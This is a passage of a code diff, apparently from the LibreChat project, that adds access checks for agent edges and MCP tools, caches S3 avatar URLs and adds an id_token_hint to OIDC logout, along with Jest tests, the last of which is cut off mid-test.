@ -243,6 +358,17 @@ const updateAgentHandler = async (req, res) => {
|
||||||
updateData.avatar = avatarField;
|
updateData.avatar = avatarField;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (updateData.edges?.length) {
|
||||||
|
const { id: userId, role: userRole } = req.user;
|
||||||
|
const unauthorized = await validateEdgeAgentAccess(updateData.edges, userId, userRole);
|
||||||
|
if (unauthorized.length > 0) {
|
||||||
|
return res.status(403).json({
|
||||||
|
error: 'You do not have access to one or more agents referenced in edges',
|
||||||
|
agent_ids: unauthorized,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// Convert OCR to context in incoming updateData
|
// Convert OCR to context in incoming updateData
|
||||||
convertOcrToContextInPlace(updateData);
|
convertOcrToContextInPlace(updateData);
|
||||||
|
|
||||||
|
|
@ -261,6 +387,26 @@ const updateAgentHandler = async (req, res) => {
|
||||||
updateData.tools = ocrConversion.tools;
|
updateData.tools = ocrConversion.tools;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (updateData.tools) {
|
||||||
|
const existingToolSet = new Set(existingAgent.tools ?? []);
|
||||||
|
const newMCPTools = updateData.tools.filter(
|
||||||
|
(t) => !existingToolSet.has(t) && t?.includes(Constants.mcp_delimiter),
|
||||||
|
);
|
||||||
|
|
||||||
|
if (newMCPTools.length > 0) {
|
||||||
|
const availableTools = (await getCachedTools()) ?? {};
|
||||||
|
const approvedNew = await filterAuthorizedTools({
|
||||||
|
tools: newMCPTools,
|
||||||
|
userId: req.user.id,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
const rejectedSet = new Set(newMCPTools.filter((t) => !approvedNew.includes(t)));
|
||||||
|
if (rejectedSet.size > 0) {
|
||||||
|
updateData.tools = updateData.tools.filter((t) => !rejectedSet.has(t));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
let updatedAgent =
|
let updatedAgent =
|
||||||
Object.keys(updateData).length > 0
|
Object.keys(updateData).length > 0
|
||||||
? await updateAgent({ id }, updateData, {
|
? await updateAgent({ id }, updateData, {
|
||||||
|
|
@ -371,7 +517,7 @@ const duplicateAgentHandler = async (req, res) => {
|
||||||
*/
|
*/
|
||||||
const duplicateAction = async (action) => {
|
const duplicateAction = async (action) => {
|
||||||
const newActionId = nanoid();
|
const newActionId = nanoid();
|
||||||
const [domain] = action.action_id.split(actionDelimiter);
|
const { domain } = action.metadata;
|
||||||
const fullActionId = `${domain}${actionDelimiter}${newActionId}`;
|
const fullActionId = `${domain}${actionDelimiter}${newActionId}`;
|
||||||
|
|
||||||
// Sanitize sensitive metadata before persisting
|
// Sanitize sensitive metadata before persisting
|
||||||
|
|
@ -381,7 +527,7 @@ const duplicateAgentHandler = async (req, res) => {
|
||||||
}
|
}
|
||||||
|
|
||||||
const newAction = await updateAction(
|
const newAction = await updateAction(
|
||||||
{ action_id: newActionId },
|
{ action_id: newActionId, agent_id: newAgentId },
|
||||||
{
|
{
|
||||||
metadata: filteredMetadata,
|
metadata: filteredMetadata,
|
||||||
agent_id: newAgentId,
|
agent_id: newAgentId,
|
||||||
|
|
@ -403,6 +549,17 @@ const duplicateAgentHandler = async (req, res) => {
|
||||||
|
|
||||||
const agentActions = await Promise.all(promises);
|
const agentActions = await Promise.all(promises);
|
||||||
newAgentData.actions = agentActions;
|
newAgentData.actions = agentActions;
|
||||||
|
|
||||||
|
if (newAgentData.tools?.length) {
|
||||||
|
const availableTools = (await getCachedTools()) ?? {};
|
||||||
|
newAgentData.tools = await filterAuthorizedTools({
|
||||||
|
tools: newAgentData.tools,
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
existingTools: newAgentData.tools,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
const newAgent = await createAgent(newAgentData);
|
const newAgent = await createAgent(newAgentData);
|
||||||
|
|
||||||
try {
|
try {
|
||||||
|
|
@ -530,10 +687,10 @@ const getListAgentsHandler = async (req, res) => {
|
||||||
*/
|
*/
|
||||||
const cache = getLogStores(CacheKeys.S3_EXPIRY_INTERVAL);
|
const cache = getLogStores(CacheKeys.S3_EXPIRY_INTERVAL);
|
||||||
const refreshKey = `${userId}:agents_avatar_refresh`;
|
const refreshKey = `${userId}:agents_avatar_refresh`;
|
||||||
const alreadyChecked = await cache.get(refreshKey);
|
let cachedRefresh = await cache.get(refreshKey);
|
||||||
if (alreadyChecked) {
|
const isValidCachedRefresh =
|
||||||
logger.debug('[/Agents] S3 avatar refresh already checked, skipping');
|
cachedRefresh != null && typeof cachedRefresh === 'object' && cachedRefresh.urlCache != null;
|
||||||
} else {
|
if (!isValidCachedRefresh) {
|
||||||
try {
|
try {
|
||||||
const fullList = await getListAgentsByAccess({
|
const fullList = await getListAgentsByAccess({
|
||||||
accessibleIds,
|
accessibleIds,
|
||||||
|
|
@ -541,16 +698,19 @@ const getListAgentsHandler = async (req, res) => {
|
||||||
limit: MAX_AVATAR_REFRESH_AGENTS,
|
limit: MAX_AVATAR_REFRESH_AGENTS,
|
||||||
after: null,
|
after: null,
|
||||||
});
|
});
|
||||||
await refreshListAvatars({
|
const { urlCache } = await refreshListAvatars({
|
||||||
agents: fullList?.data ?? [],
|
agents: fullList?.data ?? [],
|
||||||
userId,
|
userId,
|
||||||
refreshS3Url,
|
refreshS3Url,
|
||||||
updateAgent,
|
updateAgent,
|
||||||
});
|
});
|
||||||
await cache.set(refreshKey, true, Time.THIRTY_MINUTES);
|
cachedRefresh = { urlCache };
|
||||||
|
await cache.set(refreshKey, cachedRefresh, Time.THIRTY_MINUTES);
|
||||||
} catch (err) {
|
} catch (err) {
|
||||||
logger.error('[/Agents] Error refreshing avatars for full list: %o', err);
|
logger.error('[/Agents] Error refreshing avatars for full list: %o', err);
|
||||||
}
|
}
|
||||||
|
} else {
|
||||||
|
logger.debug('[/Agents] S3 avatar refresh already checked, skipping');
|
||||||
}
|
}
|
||||||
|
|
||||||
// Use the new ACL-aware function
|
// Use the new ACL-aware function
|
||||||
|
|
@ -568,11 +728,20 @@ const getListAgentsHandler = async (req, res) => {
|
||||||
|
|
||||||
const publicSet = new Set(publiclyAccessibleIds.map((oid) => oid.toString()));
|
const publicSet = new Set(publiclyAccessibleIds.map((oid) => oid.toString()));
|
||||||
|
|
||||||
|
const urlCache = cachedRefresh?.urlCache;
|
||||||
data.data = agents.map((agent) => {
|
data.data = agents.map((agent) => {
|
||||||
try {
|
try {
|
||||||
if (agent?._id && publicSet.has(agent._id.toString())) {
|
if (agent?._id && publicSet.has(agent._id.toString())) {
|
||||||
agent.isPublic = true;
|
agent.isPublic = true;
|
||||||
}
|
}
|
||||||
|
if (
|
||||||
|
urlCache &&
|
||||||
|
agent?.id &&
|
||||||
|
agent?.avatar?.source === FileSources.s3 &&
|
||||||
|
urlCache[agent.id]
|
||||||
|
) {
|
||||||
|
agent.avatar = { ...agent.avatar, filepath: urlCache[agent.id] };
|
||||||
|
}
|
||||||
} catch (e) {
|
} catch (e) {
|
||||||
// Silently ignore mapping errors
|
// Silently ignore mapping errors
|
||||||
void e;
|
void e;
|
||||||
|
|
@ -658,6 +827,14 @@ const uploadAgentAvatarHandler = async (req, res) => {
|
||||||
const updatedAgent = await updateAgent({ id: agent_id }, data, {
|
const updatedAgent = await updateAgent({ id: agent_id }, data, {
|
||||||
updatingUserId: req.user.id,
|
updatingUserId: req.user.id,
|
||||||
});
|
});
|
||||||
|
|
||||||
|
try {
|
||||||
|
const avatarCache = getLogStores(CacheKeys.S3_EXPIRY_INTERVAL);
|
||||||
|
await avatarCache.delete(`${req.user.id}:agents_avatar_refresh`);
|
||||||
|
} catch (cacheErr) {
|
||||||
|
logger.error('[/:agent_id/avatar] Error invalidating avatar refresh cache', cacheErr);
|
||||||
|
}
|
||||||
|
|
||||||
res.status(201).json(updatedAgent);
|
res.status(201).json(updatedAgent);
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
const message = 'An error occurred while updating the Agent Avatar';
|
const message = 'An error occurred while updating the Agent Avatar';
|
||||||
|
|
@ -711,7 +888,24 @@ const revertAgentVersionHandler = async (req, res) => {
|
||||||
|
|
||||||
// Permissions are enforced via route middleware (ACL EDIT)
|
// Permissions are enforced via route middleware (ACL EDIT)
|
||||||
|
|
||||||
const updatedAgent = await revertAgentVersion({ id }, version_index);
|
let updatedAgent = await revertAgentVersion({ id }, version_index);
|
||||||
|
|
||||||
|
if (updatedAgent.tools?.length) {
|
||||||
|
const availableTools = (await getCachedTools()) ?? {};
|
||||||
|
const filteredTools = await filterAuthorizedTools({
|
||||||
|
tools: updatedAgent.tools,
|
||||||
|
userId: req.user.id,
|
||||||
|
availableTools,
|
||||||
|
existingTools: updatedAgent.tools,
|
||||||
|
});
|
||||||
|
if (filteredTools.length !== updatedAgent.tools.length) {
|
||||||
|
updatedAgent = await updateAgent(
|
||||||
|
{ id },
|
||||||
|
{ tools: filteredTools },
|
||||||
|
{ updatingUserId: req.user.id },
|
||||||
|
);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
if (updatedAgent.author) {
|
if (updatedAgent.author) {
|
||||||
updatedAgent.author = updatedAgent.author.toString();
|
updatedAgent.author = updatedAgent.author.toString();
|
||||||
|
|
@ -779,4 +973,5 @@ module.exports = {
|
||||||
uploadAgentAvatar: uploadAgentAvatarHandler,
|
uploadAgentAvatar: uploadAgentAvatarHandler,
|
||||||
revertAgentVersion: revertAgentVersionHandler,
|
revertAgentVersion: revertAgentVersionHandler,
|
||||||
getAgentCategories,
|
getAgentCategories,
|
||||||
|
filterAuthorizedTools,
|
||||||
};
|
};
|
||||||
|
|
|
||||||
|
|
@ -2,7 +2,7 @@ const mongoose = require('mongoose');
|
||||||
const { nanoid } = require('nanoid');
|
const { nanoid } = require('nanoid');
|
||||||
const { v4: uuidv4 } = require('uuid');
|
const { v4: uuidv4 } = require('uuid');
|
||||||
const { agentSchema } = require('@librechat/data-schemas');
|
const { agentSchema } = require('@librechat/data-schemas');
|
||||||
const { FileSources } = require('librechat-data-provider');
|
const { FileSources, PermissionBits } = require('librechat-data-provider');
|
||||||
const { MongoMemoryServer } = require('mongodb-memory-server');
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
|
||||||
// Only mock the dependencies that are not database-related
|
// Only mock the dependencies that are not database-related
|
||||||
|
|
@ -46,9 +46,9 @@ jest.mock('~/models/File', () => ({
|
||||||
jest.mock('~/server/services/PermissionService', () => ({
|
jest.mock('~/server/services/PermissionService', () => ({
|
||||||
findAccessibleResources: jest.fn().mockResolvedValue([]),
|
findAccessibleResources: jest.fn().mockResolvedValue([]),
|
||||||
findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]),
|
findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]),
|
||||||
|
getResourcePermissionsMap: jest.fn().mockResolvedValue(new Map()),
|
||||||
grantPermission: jest.fn(),
|
grantPermission: jest.fn(),
|
||||||
hasPublicPermission: jest.fn().mockResolvedValue(false),
|
hasPublicPermission: jest.fn().mockResolvedValue(false),
|
||||||
checkPermission: jest.fn().mockResolvedValue(true),
|
|
||||||
}));
|
}));
|
||||||
|
|
||||||
jest.mock('~/models', () => ({
|
jest.mock('~/models', () => ({
|
||||||
|
|
@ -59,6 +59,7 @@ jest.mock('~/models', () => ({
|
||||||
const mockCache = {
|
const mockCache = {
|
||||||
get: jest.fn(),
|
get: jest.fn(),
|
||||||
set: jest.fn(),
|
set: jest.fn(),
|
||||||
|
delete: jest.fn(),
|
||||||
};
|
};
|
||||||
jest.mock('~/cache', () => ({
|
jest.mock('~/cache', () => ({
|
||||||
getLogStores: jest.fn(() => mockCache),
|
getLogStores: jest.fn(() => mockCache),
|
||||||
|
|
@ -73,6 +74,7 @@ const {
|
||||||
const {
|
const {
|
||||||
findAccessibleResources,
|
findAccessibleResources,
|
||||||
findPubliclyAccessibleResources,
|
findPubliclyAccessibleResources,
|
||||||
|
getResourcePermissionsMap,
|
||||||
} = require('~/server/services/PermissionService');
|
} = require('~/server/services/PermissionService');
|
||||||
|
|
||||||
const { refreshS3Url } = require('~/server/services/Files/S3/crud');
|
const { refreshS3Url } = require('~/server/services/Files/S3/crud');
|
||||||
|
|
@ -1309,7 +1311,7 @@ describe('Agent Controllers - Mass Assignment Protection', () => {
|
||||||
});
|
});
|
||||||
|
|
||||||
test('should skip avatar refresh if cache hit', async () => {
|
test('should skip avatar refresh if cache hit', async () => {
|
||||||
mockCache.get.mockResolvedValue(true);
|
mockCache.get.mockResolvedValue({ urlCache: {} });
|
||||||
findAccessibleResources.mockResolvedValue([agentWithS3Avatar._id]);
|
findAccessibleResources.mockResolvedValue([agentWithS3Avatar._id]);
|
||||||
findPubliclyAccessibleResources.mockResolvedValue([]);
|
findPubliclyAccessibleResources.mockResolvedValue([]);
|
||||||
|
|
||||||
|
|
@ -1348,8 +1350,12 @@ describe('Agent Controllers - Mass Assignment Protection', () => {
|
||||||
// Verify S3 URL was refreshed
|
// Verify S3 URL was refreshed
|
||||||
expect(refreshS3Url).toHaveBeenCalled();
|
expect(refreshS3Url).toHaveBeenCalled();
|
||||||
|
|
||||||
// Verify cache was set
|
// Verify cache was set with urlCache map, not a plain boolean
|
||||||
expect(mockCache.set).toHaveBeenCalled();
|
expect(mockCache.set).toHaveBeenCalledWith(
|
||||||
|
expect.any(String),
|
||||||
|
expect.objectContaining({ urlCache: expect.any(Object) }),
|
||||||
|
expect.any(Number),
|
||||||
|
);
|
||||||
|
|
||||||
// Verify response was returned
|
// Verify response was returned
|
||||||
expect(mockRes.json).toHaveBeenCalled();
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
|
@ -1563,5 +1569,191 @@ describe('Agent Controllers - Mass Assignment Protection', () => {
|
||||||
// Verify that the handler completed successfully
|
// Verify that the handler completed successfully
|
||||||
expect(mockRes.json).toHaveBeenCalled();
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
test('should treat legacy boolean cache entry as a miss and run refresh', async () => {
|
||||||
|
// Simulate a cache entry written by the pre-fix code
|
||||||
|
mockCache.get.mockResolvedValue(true);
|
||||||
|
findAccessibleResources.mockResolvedValue([agentWithS3Avatar._id]);
|
||||||
|
findPubliclyAccessibleResources.mockResolvedValue([]);
|
||||||
|
refreshS3Url.mockResolvedValue('new-s3-path.jpg');
|
||||||
|
|
||||||
|
const mockReq = {
|
||||||
|
user: { id: userA.toString(), role: 'USER' },
|
||||||
|
query: {},
|
||||||
|
};
|
||||||
|
const mockRes = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn().mockReturnThis(),
|
||||||
|
};
|
||||||
|
|
||||||
|
await getListAgentsHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
// Boolean true fails the shape guard, so refresh must run
|
||||||
|
expect(refreshS3Url).toHaveBeenCalled();
|
||||||
|
// Cache is overwritten with the proper format
|
||||||
|
expect(mockCache.set).toHaveBeenCalledWith(
|
||||||
|
expect.any(String),
|
||||||
|
expect.objectContaining({ urlCache: expect.any(Object) }),
|
||||||
|
expect.any(Number),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should apply cached urlCache filepath to paginated response on cache hit', async () => {
|
||||||
|
const agentId = agentWithS3Avatar.id;
|
||||||
|
const cachedUrl = 'cached-presigned-url.jpg';
|
||||||
|
|
||||||
|
mockCache.get.mockResolvedValue({ urlCache: { [agentId]: cachedUrl } });
|
||||||
|
findAccessibleResources.mockResolvedValue([agentWithS3Avatar._id]);
|
||||||
|
findPubliclyAccessibleResources.mockResolvedValue([]);
|
||||||
|
|
||||||
|
const mockReq = {
|
||||||
|
user: { id: userA.toString(), role: 'USER' },
|
||||||
|
query: {},
|
||||||
|
};
|
||||||
|
const mockRes = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn().mockReturnThis(),
|
||||||
|
};
|
||||||
|
|
||||||
|
await getListAgentsHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(refreshS3Url).not.toHaveBeenCalled();
|
||||||
|
|
||||||
|
const responseData = mockRes.json.mock.calls[0][0];
|
||||||
|
const agent = responseData.data.find((a) => a.id === agentId);
|
||||||
|
// Cached URL is served, not the stale DB value 'old-s3-path.jpg'
|
||||||
|
expect(agent.avatar.filepath).toBe(cachedUrl);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should preserve DB filepath for agents absent from urlCache on cache hit', async () => {
|
||||||
|
mockCache.get.mockResolvedValue({ urlCache: {} });
|
||||||
|
findAccessibleResources.mockResolvedValue([agentWithS3Avatar._id]);
|
||||||
|
findPubliclyAccessibleResources.mockResolvedValue([]);
|
||||||
|
|
||||||
|
const mockReq = {
|
||||||
|
user: { id: userA.toString(), role: 'USER' },
|
||||||
|
query: {},
|
||||||
|
};
|
||||||
|
const mockRes = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn().mockReturnThis(),
|
||||||
|
};
|
||||||
|
|
||||||
|
await getListAgentsHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(refreshS3Url).not.toHaveBeenCalled();
|
||||||
|
|
||||||
|
const responseData = mockRes.json.mock.calls[0][0];
|
||||||
|
const agent = responseData.data.find((a) => a.id === agentWithS3Avatar.id);
|
||||||
|
expect(agent.avatar.filepath).toBe('old-s3-path.jpg');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('Edge ACL validation', () => {
|
||||||
|
let targetAgent;
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
targetAgent = await Agent.create({
|
||||||
|
id: `agent_${nanoid()}`,
|
||||||
|
author: new mongoose.Types.ObjectId().toString(),
|
||||||
|
name: 'Target Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: [],
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
test('createAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => {
|
||||||
|
const permMap = new Map();
|
||||||
|
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
|
||||||
|
|
||||||
|
mockReq.body = {
|
||||||
|
name: 'Attacker Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }],
|
||||||
|
};
|
||||||
|
|
||||||
|
await createAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(403);
|
||||||
|
const response = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(response.agent_ids).toContain(targetAgent.id);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('createAgentHandler should succeed when user has VIEW on all edge-referenced agents', async () => {
|
||||||
|
const permMap = new Map([[targetAgent._id.toString(), 1]]);
|
||||||
|
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
|
||||||
|
|
||||||
|
mockReq.body = {
|
||||||
|
name: 'Legit Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }],
|
||||||
|
};
|
||||||
|
|
||||||
|
await createAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(201);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('createAgentHandler should allow edges referencing non-existent agents (self-reference at create time)', async () => {
|
||||||
|
mockReq.body = {
|
||||||
|
name: 'Self-Ref Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
edges: [{ from: 'agent_does_not_exist_yet', to: 'agent_also_new', edgeType: 'handoff' }],
|
||||||
|
};
|
||||||
|
|
||||||
|
await createAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(201);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('updateAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => {
|
||||||
|
const ownedAgent = await Agent.create({
|
||||||
|
id: `agent_${nanoid()}`,
|
||||||
|
author: mockReq.user.id,
|
||||||
|
name: 'Owned Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: [],
|
||||||
|
});
|
||||||
|
|
||||||
|
const permMap = new Map([[ownedAgent._id.toString(), PermissionBits.VIEW]]);
|
||||||
|
getResourcePermissionsMap.mockResolvedValueOnce(permMap);
|
||||||
|
|
||||||
|
mockReq.params = { id: ownedAgent.id };
|
||||||
|
mockReq.body = {
|
||||||
|
edges: [{ from: ownedAgent.id, to: targetAgent.id, edgeType: 'handoff' }],
|
||||||
|
};
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(403);
|
||||||
|
const response = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(response.agent_ids).toContain(targetAgent.id);
|
||||||
|
expect(response.agent_ids).not.toContain(ownedAgent.id);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('updateAgentHandler should succeed when edges field is absent from payload', async () => {
|
||||||
|
const ownedAgent = await Agent.create({
|
||||||
|
id: `agent_${nanoid()}`,
|
||||||
|
author: mockReq.user.id,
|
||||||
|
name: 'Owned Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: [],
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq.params = { id: ownedAgent.id };
|
||||||
|
mockReq.body = { name: 'Renamed Agent' };
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).not.toHaveBeenCalledWith(403);
|
||||||
|
const response = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(response.name).toBe('Renamed Agent');
|
||||||
|
});
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
|
||||||
|
|
@ -8,13 +8,16 @@ const logoutController = async (req, res) => {
|
||||||
const parsedCookies = req.headers.cookie ? cookies.parse(req.headers.cookie) : {};
|
const parsedCookies = req.headers.cookie ? cookies.parse(req.headers.cookie) : {};
|
||||||
const isOpenIdUser = req.user?.openidId != null && req.user?.provider === 'openid';
|
const isOpenIdUser = req.user?.openidId != null && req.user?.provider === 'openid';
|
||||||
|
|
||||||
/** For OpenID users, read refresh token from session; for others, use cookie */
|
/** For OpenID users, read tokens from session (with cookie fallback) */
|
||||||
let refreshToken;
|
let refreshToken;
|
||||||
|
let idToken;
|
||||||
if (isOpenIdUser && req.session?.openidTokens) {
|
if (isOpenIdUser && req.session?.openidTokens) {
|
||||||
refreshToken = req.session.openidTokens.refreshToken;
|
refreshToken = req.session.openidTokens.refreshToken;
|
||||||
|
idToken = req.session.openidTokens.idToken;
|
||||||
delete req.session.openidTokens;
|
delete req.session.openidTokens;
|
||||||
}
|
}
|
||||||
refreshToken = refreshToken || parsedCookies.refreshToken;
|
refreshToken = refreshToken || parsedCookies.refreshToken;
|
||||||
|
idToken = idToken || parsedCookies.openid_id_token;
|
||||||
|
|
||||||
try {
|
try {
|
||||||
const logout = await logoutUser(req, refreshToken);
|
const logout = await logoutUser(req, refreshToken);
|
||||||
|
|
@ -31,21 +34,34 @@ const logoutController = async (req, res) => {
|
||||||
isEnabled(process.env.OPENID_USE_END_SESSION_ENDPOINT) &&
|
isEnabled(process.env.OPENID_USE_END_SESSION_ENDPOINT) &&
|
||||||
process.env.OPENID_ISSUER
|
process.env.OPENID_ISSUER
|
||||||
) {
|
) {
|
||||||
const openIdConfig = getOpenIdConfig();
|
let openIdConfig;
|
||||||
if (!openIdConfig) {
|
try {
|
||||||
logger.warn(
|
openIdConfig = getOpenIdConfig();
|
||||||
'[logoutController] OpenID config not found. Please verify that the open id configuration and initialization are correct.',
|
} catch (err) {
|
||||||
);
|
logger.warn('[logoutController] OpenID config not available:', err.message);
|
||||||
} else {
|
}
|
||||||
const endSessionEndpoint = openIdConfig
|
if (openIdConfig) {
|
||||||
? openIdConfig.serverMetadata().end_session_endpoint
|
const endSessionEndpoint = openIdConfig.serverMetadata().end_session_endpoint;
|
||||||
: null;
|
|
||||||
if (endSessionEndpoint) {
|
if (endSessionEndpoint) {
|
||||||
const endSessionUrl = new URL(endSessionEndpoint);
|
const endSessionUrl = new URL(endSessionEndpoint);
|
||||||
/** Redirect back to app's login page after IdP logout */
|
/** Redirect back to app's login page after IdP logout */
|
||||||
const postLogoutRedirectUri =
|
const postLogoutRedirectUri =
|
||||||
process.env.OPENID_POST_LOGOUT_REDIRECT_URI || `${process.env.DOMAIN_CLIENT}/login`;
|
process.env.OPENID_POST_LOGOUT_REDIRECT_URI || `${process.env.DOMAIN_CLIENT}/login`;
|
||||||
endSessionUrl.searchParams.set('post_logout_redirect_uri', postLogoutRedirectUri);
|
endSessionUrl.searchParams.set('post_logout_redirect_uri', postLogoutRedirectUri);
|
||||||
|
|
||||||
|
/** Add id_token_hint (preferred) or client_id for OIDC spec compliance */
|
||||||
|
if (idToken) {
|
||||||
|
endSessionUrl.searchParams.set('id_token_hint', idToken);
|
||||||
|
} else if (process.env.OPENID_CLIENT_ID) {
|
||||||
|
endSessionUrl.searchParams.set('client_id', process.env.OPENID_CLIENT_ID);
|
||||||
|
} else {
|
||||||
|
logger.warn(
|
||||||
|
'[logoutController] Neither id_token_hint nor OPENID_CLIENT_ID is available. ' +
|
||||||
|
'To enable id_token_hint, set OPENID_REUSE_TOKENS=true. ' +
|
||||||
|
'The OIDC end-session request may be rejected by the identity provider.',
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
response.redirect = endSessionUrl.toString();
|
response.redirect = endSessionUrl.toString();
|
||||||
} else {
|
} else {
|
||||||
logger.warn(
|
logger.warn(
|
||||||
|
|
|
||||||
259
api/server/controllers/auth/LogoutController.spec.js
Normal file
259
api/server/controllers/auth/LogoutController.spec.js
Normal file
|
|
@ -0,0 +1,259 @@
|
||||||
|
const cookies = require('cookie');
|
||||||
|
|
||||||
|
const mockLogoutUser = jest.fn();
|
||||||
|
const mockLogger = { warn: jest.fn(), error: jest.fn() };
|
||||||
|
const mockIsEnabled = jest.fn();
|
||||||
|
const mockGetOpenIdConfig = jest.fn();
|
||||||
|
|
||||||
|
jest.mock('cookie');
|
||||||
|
jest.mock('@librechat/api', () => ({ isEnabled: (...args) => mockIsEnabled(...args) }));
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({ logger: mockLogger }));
|
||||||
|
jest.mock('~/server/services/AuthService', () => ({
|
||||||
|
logoutUser: (...args) => mockLogoutUser(...args),
|
||||||
|
}));
|
||||||
|
jest.mock('~/strategies', () => ({ getOpenIdConfig: () => mockGetOpenIdConfig() }));
|
||||||
|
|
||||||
|
const { logoutController } = require('./LogoutController');
|
||||||
|
|
||||||
|
function buildReq(overrides = {}) {
|
||||||
|
return {
|
||||||
|
user: { _id: 'user1', openidId: 'oid1', provider: 'openid' },
|
||||||
|
headers: { cookie: 'refreshToken=rt1' },
|
||||||
|
session: {
|
||||||
|
openidTokens: { refreshToken: 'srt', idToken: 'small-id-token' },
|
||||||
|
destroy: jest.fn(),
|
||||||
|
},
|
||||||
|
...overrides,
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
function buildRes() {
|
||||||
|
const res = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
send: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn().mockReturnThis(),
|
||||||
|
clearCookie: jest.fn(),
|
||||||
|
};
|
||||||
|
return res;
|
||||||
|
}
|
||||||
|
|
||||||
|
const ORIGINAL_ENV = process.env;
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
process.env = {
|
||||||
|
...ORIGINAL_ENV,
|
||||||
|
OPENID_USE_END_SESSION_ENDPOINT: 'true',
|
||||||
|
OPENID_ISSUER: 'https://idp.example.com',
|
||||||
|
OPENID_CLIENT_ID: 'my-client-id',
|
||||||
|
DOMAIN_CLIENT: 'https://app.example.com',
|
||||||
|
};
|
||||||
|
cookies.parse.mockReturnValue({ refreshToken: 'cookie-rt' });
|
||||||
|
mockLogoutUser.mockResolvedValue({ status: 200, message: 'Logout successful' });
|
||||||
|
mockIsEnabled.mockReturnValue(true);
|
||||||
|
mockGetOpenIdConfig.mockReturnValue({
|
||||||
|
serverMetadata: () => ({
|
||||||
|
end_session_endpoint: 'https://idp.example.com/logout',
|
||||||
|
}),
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(() => {
|
||||||
|
process.env = ORIGINAL_ENV;
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('LogoutController', () => {
|
||||||
|
describe('id_token_hint from session', () => {
|
||||||
|
it('sets id_token_hint when session has idToken', async () => {
|
||||||
|
const req = buildReq();
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
||||||
|
|
||||||
|
const body = res.send.mock.calls[0][0];
|
||||||
|
expect(body.redirect).toContain('id_token_hint=small-id-token');
|
||||||
|
expect(body.redirect).not.toContain('client_id=');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('id_token_hint from cookie fallback', () => {
|
||||||
|
it('uses cookie id_token when session has no tokens', async () => {
|
||||||
|
cookies.parse.mockReturnValue({
|
||||||
|
refreshToken: 'cookie-rt',
|
||||||
|
openid_id_token: 'cookie-id-token',
|
||||||
|
});
|
||||||
|
const req = buildReq({ session: { destroy: jest.fn() } });
|
||||||
|
const res = buildRes();
|
||||||
|
|
||||||
|
await logoutController(req, res);
|
